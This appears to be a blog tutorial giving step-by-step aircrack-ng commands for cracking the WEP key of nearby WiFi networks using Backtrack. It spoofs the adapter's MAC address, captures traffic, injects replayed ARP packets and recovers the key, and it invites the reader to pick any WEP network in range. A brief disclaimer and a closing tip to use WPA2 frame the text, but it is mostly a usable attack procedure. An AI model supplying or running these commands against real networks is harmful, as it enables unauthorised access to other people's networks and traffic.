If you want to lock down your WiFi-Network , you should opt for WPA encryption for high level security. As WEP encryption is too easy to crack. Yes, its very easy to crack WEP Password of any WiFi Network.
Today we are going to share you complete method of cracking WiFi Network password step by step
Note: Knowledge is power, so it doesn’t mean you should do anything illegal, knowing how to pick up a lock doesn’t mean you are a thief. This article is only for knowledge purpose.
What you’ll need
1 A compatible Wireless Adapter
2. A Backtrack CD
3. A nearby WEP enable WiFi network
4. Patience with command lines
How To Crack WEP Password Of Wifi Network Using Backtrack
Step 1. First of all install Backtrack and Open the program. Click on Shell and open Shell console
Step 2. Open Shell Konsole and enter the below command.
airmon-ng
Read Also : Best Websites to Learn Ethical Hacking.
Step 3. The above code will display chipset and driver name. Now enter the below command
airmon-ng stop (interface)<br>ifconfig (interface) down<br>macchanger --mac 00:11:22:33:44:55 (interface)<br>airmon-ng start (interface)
Step 4. It will display all WiFi networks which are available around you. Select any WEP Encryption network. For further steps I am using “yoyo”. and enter the below code.
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
Step 5. After entering above codes, you ll get an background window like in this image, now open a second Konsole window and enter this code
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
Read Also : Top 10 Apps To Record Slow Motion Videos
Step 6.Now here’s the part where you need to grab a coffee. You have to enter the below code to fetch data to crack the password
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
Step 7. Here’s the final part, once you have collected enough data, its the moment of truth. Now open third Konsole window and enter the below code to find out the password.
aircrack-ng -b (bssid) (file name-01.cap)
But in case you wont able to find out the password. wait for it and let ’em collect more data.
The WEP key appears as “Key Found” and this is the password of that WiFi Network.
That’s it !! hope you have learnt something new today. So if you want to secure your WiFi network at a high level it is highly recommended that you should secure the password to WPA or WPA2 encryption.
If you have any question related to this article kindly post them below.